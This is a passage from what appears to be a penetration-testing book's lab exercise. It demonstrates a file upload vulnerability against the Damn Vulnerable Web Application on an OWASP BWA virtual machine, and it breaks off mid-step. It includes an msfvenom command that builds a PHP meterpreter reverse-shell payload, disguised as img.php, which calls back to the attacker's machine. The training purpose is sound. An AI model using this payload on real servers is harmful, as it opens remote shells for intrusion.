In this exercise, we are going to use our OWASP BWA virtual machine to demonstrate a file upload vulnerability. Let's get started:
- First, create a payload on your Kali Linux (attacker) machine using msfvenom, which will later be uploaded to the target server. Using the following syntax, create a PHP-based payload for establishing a reverse connection:
msfvenom -p php/meterpreter/reverse_tcp lhost=<IP address of Kali Linux> lport=4444 -f raw
- Copy the highlighted code, open a text editor, and save the file as img.php:
![](https://static.packt-cdn.com/products/9781789611809/graphics/assets/3515f8e8-4851-440d-8653-46e9b222a624.png)
- Using your web browser within Kali Linux, enter the IP address of OWASP BWA in the address bar and hit Enter.
- On the main page, click on Damn Vulnerable Web Application:
![](https://static.packt-cdn.com/products/9781789611809/graphics/assets/4c9eb84f-eccd-4a1c-bc70-04ce74a48e2c.png)
- The DVWA login portal will appear. Log in with admin/admin as Username/Password:
![](https://static.packt-cdn.com/products/9781789611809/graphics/assets/a72d97a5-d315-4397-b695-4515e21e5566.png)
- Once logged in, you'll see a menu on the left-hand...